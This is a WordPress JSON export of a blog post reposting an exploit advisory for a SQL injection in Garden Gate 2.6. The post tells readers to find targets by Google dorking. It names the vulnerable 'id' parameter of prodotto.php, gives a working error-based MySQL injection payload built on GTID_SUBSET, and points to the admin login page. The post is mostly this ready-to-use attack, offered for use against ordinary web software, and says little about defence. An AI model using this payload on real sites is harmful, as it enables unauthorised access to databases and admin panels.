{"id":58822,"date":"2024-08-12T19:40:45","date_gmt":"2024-08-12T16:40:45","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180054\/gardengate26-sql.txt"},"modified":"2024-08-12T19:40:45","modified_gmt":"2024-08-12T16:40:45","slug":"garden-gate-2-6-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/garden-gate-2-6-sql-injection\/","title":{"rendered":"Garden Gate 2.6 SQL Injection"},"content":{"rendered":"<p>=============================================================================================================================================<br \/>| # Title : Garden Gate v2.6 SQL injection Vulnerability |<br \/>| # Author : indoushka |<br \/>| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) |<br \/>| # Vendor : https:\/\/www.34network.it\/ |<br \/>=============================================================================================================================================<\/p>\n<p>poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] use payload : \/prodotto.php?id=\\<\/p>\n[+] https:\/\/www\/127.0.0.1\/demo\/paiardicom\/prodotto.php?id=\\ &lt;=== inject here<\/p>\n<p>&#8212;<\/p>\n<p>Parameter: id (GET)<br \/>Type: error-based<br \/>Title: MySQL &gt;= 5.6 AND error-based &#8211; WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br \/>Payload: id=\\&#8217; AND GTID_SUBSET(CONCAT(0x716b786b71,(SELECT (ELT(6210=6210,1))),0x716b7a7671),6210)&#8211; WkuH<br \/>&#8212;<\/p>\n[+] Login : https:\/\/www\/127.0.0.1\/demo\/www.paiardicom\/tq\/index.php?manager=login<\/p>\n<p>Greetings to :============================================================<br \/>jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br \/>==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=============================================================================================================================================| # Title : Garden Gate v2.6 SQL injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https:\/\/www.34network.it\/ |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] use payload : \/prodotto.php?id=\\ [+] https:\/\/www\/127.0.0.1\/demo\/paiardicom\/prodotto.php?id=\\ &lt;=== &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58822","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58822","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58822"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58822\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58822"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58822"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58822"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}